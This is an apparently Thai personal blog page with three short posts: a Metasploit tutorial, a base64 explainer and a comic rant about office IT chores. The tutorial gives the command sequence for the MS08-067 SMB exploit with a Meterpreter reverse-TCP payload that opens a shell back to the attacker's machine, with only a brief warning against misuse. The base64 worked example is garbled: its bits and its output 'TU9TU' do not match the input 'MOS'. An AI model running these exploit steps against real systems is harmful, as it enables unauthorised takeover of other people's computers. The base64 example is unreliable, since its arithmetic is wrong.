วันอังคารที่ 20 สิงหาคม พ.ศ. 2556

ตอน7 ยึดเครื่องด้วย metasploit


วันนี้พี่จันจะมาสอนการยึดเครื่องด้วย metasploit กันนะครับ
1. เปิดหน้าต่าง terminalขึ้นมาแล้วพิมพ์คำสั่ง  msfconsole
2.เรียกใช้โมดูล exploit ms08_067_netapi โดยพิมพ์คำสั่ง use exploit/windows/smb/ms08_067_netapi
3.กำหนดให้ไปยังเครื่องเป้าหมาย โดยใช้คำสั่ง set RHOST IPเป้าหมาย
4.กำหนด payload ที่ใช้แนบไปกับexploit โดยใช้คำสั่ง set PAYLOAD windows/meterpeter/reverse_tcp
5.กำหนดหมายเลขIPและพอร์ตของเครื่องเราที่จะให้เชื่อมต่อกลับมาโดยใช้คำสั่ง set LHOST ตามด้วยIPเครื่องเรา และคำสั่ง set LPORT ตามด้วยportที่เปิดไว้
6.จากนั้นเริ่มโจมตีด้วยคำสั่ง exploit เป็นการเสร็จเรียบร้อยสามารถยึดเครื่องได้แล้ว
7.เมื่อเข้ามาแล้วสามารถเช็คเครื่องป้าหมายโดยใช้คำสั่ง sysinfo
ปล.อย่านำไปใช้ในทางที่ผิดกันนะครับ มันเป็นสิ่งไม่ดี ผิด พรบคอมพิวเตอร์กัน

เขียนโดย ที่ 1 ความคิดเห็น:

วันจันทร์ที่ 19 สิงหาคม พ.ศ. 2556

ตอนที่6 วิธีการเข้ารหัส-ถอดรหัส base64

อิน:จันไอ้ base64มันคืออะไรอ่ะ เห็นเพื่อนมันพูดกัน
จัน:Base64 เป็นวิธีการเข้ารหัสอย่างหนึ่งทำโดยเปลี่ยนจากคำหรือข้อความไปเป็นรูปแบบที่ไม่สามารถอ่านได้ง่ายสำหรับวิธีการเข้ารหัสแบบ base64
อิน:แล้วมันมีหลักการยังไงหรอ
จัน:ยกตัวอย่างคำว่า ?MOS? ต้องการเข้ารหัสแบบ base64 ขั้นตอนแรกให้ถอดค่ารหัส ASCII ของแต่ละตัวอักขระ



จัน:ต่อจากนั้นให้เปลี่ยนเป็นระบบเลขฐาน 2 และเขียนติดกันดังนี้ 01001101010011110101001101010100
จัน:ตัดสตริงของบิตดังกล่าวออกเป็นช่วงละ 6 บิต010011   010100   111101   010011   010100   
จัน:ซึ่งจะได้เลขในระบบฐาน 10 ดังนี้  19   20   61   19   20
จัน:เปลี่ยนจากเลขในระบบฐาน 10 ที่ได้ให้เป็นอักขระ base64 โดยใช้ตาราง Base64 Encoding

จัน:ดังนั้นคำว่า ?MOS? เมื่อได้เข้ารหัสแบบ base64 จะถูกเปลี่ยนเป็น ?TU9TU?


เขียนโดย ที่ 2 ความคิดเห็น:

วันพฤหัสบดีที่ 1 สิงหาคม พ.ศ. 2556

ตอนที่5 เข้าใจหัวอกโผมมบ้างง

ณ ที่ ทำงานของจัน
หัวหน้า : จัน คอมพังซ่อมให้หน่อยนะ
เพื่อนร่วมงานคนที่1 : จัน ลงwindowsใหม่ให้หน่อยสิ
เพื่อนร่วมงานคนที่2 : จัน เครื่องปริ้นเสีย มันเป็นอะไรหรอ
เพื่อนร่วมงานคนที่3 : จัน ช่วยไปเลือกซื้อคอมให้หน่อยสิ
เพื่อนร่วมงานคนที่4 : จัน เน็ตเล่นไม่ได้ ทำให้หน่อย
เพื่อนร่วมงานคนที่5 : จัน โหลดโปรแกรมโหลดยังไง
แล้วคนนู่นคนนี่ก็มาๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆใช้จัน!!
จัน ได้แต่ตอบว่า
จัน: ครับ!!! ทั้งๆที่ข้างในใจพูดกับตัวเองว่า(ไอ้สาดดดด ตอนกูมาสมัครงาน ตำแหน่งกูโปรแกรมเมอร์ แต่แม่งดันใช้กูทุกเรื่อง ตบสักทีดีไหม T_T)
ปล.คนที่จบคอมมาไม่ได้แปลว่าจะรู้หรือทำงานเกี่ยวกับคอมเป็นทุกเรื่องนะครับ ก่อนจะใช้งานควรถามด้วยว่า มึง!!ถนัดด้านไหน นะฮ้าาาา

เขียนโดย ที่ ไม่มีความคิดเห็น:
สมัครสมาชิก: บทความ (Atom)